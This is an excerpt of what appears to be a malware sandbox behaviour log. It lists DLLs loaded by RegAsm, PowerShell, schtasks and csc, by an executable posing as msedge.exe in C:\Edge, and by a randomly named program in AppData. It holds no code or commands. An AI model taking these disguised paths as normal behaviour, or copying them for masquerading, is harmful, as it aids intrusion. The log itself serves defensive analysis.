Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Edge\msedge.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: ktmw32.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Edge\msedge.exe	Section loaded: mscoree.dll
Source: C:\Edge\msedge.exe	Section loaded: kernel.appcore.dll
Source: C:\Edge\msedge.exe	Section loaded: version.dll
Source: C:\Edge\msedge.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Edge\msedge.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Edge\msedge.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Edge\msedge.exe	Section loaded: uxtheme.dll
Source: C:\Edge\msedge.exe	Section loaded: windows.storage.dll
Source: C:\Edge\msedge.exe	Section loaded: wldp.dll
Source: C:\Edge\msedge.exe	Section loaded: profapi.dll
Source: C:\Edge\msedge.exe	Section loaded: cryptsp.dll
Source: C:\Edge\msedge.exe	Section loaded: rsaenh.dll
Source: C:\Edge\msedge.exe	Section loaded: cryptbase.dll
Source: C:\Edge\msedge.exe	Section loaded: sspicli.dll
Source: C:\Edge\msedge.exe	Section loaded: mscoree.dll
Source: C:\Edge\msedge.exe	Section loaded: kernel.appcore.dll
Source: C:\Edge\msedge.exe	Section loaded: version.dll
Source: C:\Edge\msedge.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Edge\msedge.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Edge\msedge.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Edge\msedge.exe	Section loaded: uxtheme.dll
Source: C:\Edge\msedge.exe	Section loaded: windows.storage.dll
Source: C:\Edge\msedge.exe	Section loaded: wldp.dll
Source: C:\Edge\msedge.exe	Section loaded: profapi.dll
Source: C:\Edge\msedge.exe	Section loaded: cryptsp.dll
Source: C:\Edge\msedge.exe	Section loaded: rsaenh.dll
Source: C:\Edge\msedge.exe	Section loaded: cryptbase.dll
Source: C:\Edge\msedge.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Edge\msedge.exe	Section loaded: mscoree.dll
Source: C:\Edge\msedge.exe	Section loaded: kernel.appcore.dll
Source: C:\Edge\msedge.exe	Section loaded: version.dll
Source: C:\Edge\msedge.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Edge\msedge.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Edge\msedge.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Edge\msedge.exe	Section loaded: uxtheme.dll
Source: C:\Edge\msedge.exe	Section loaded: windows.storage.dll
Source: C:\Edge\msedge.exe	Section loaded: wldp.dll
Source: C:\Edge\msedge.exe	Section loaded: profapi.dll
Source: C:\Edge\msedge.exe	Section loaded: cryptsp.dll
Source: C:\Edge\msedge.exe	Section loaded: rsaenh.dll
Source: C:\Edge\msedge.exe	Section loaded: cryptbase.dll
Source: C:\Edge\msedge.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Edge\msedge.exe	Section loaded: mscoree.dll
Source: C:\Edge\msedge.exe	Section loaded: kernel.appcore.dll
Source: C:\Edge\msedge.exe	Section loaded: version.dll
Source: C:\Edge\msedge.exe	Section loaded: vcruntime140_clr0400.dll
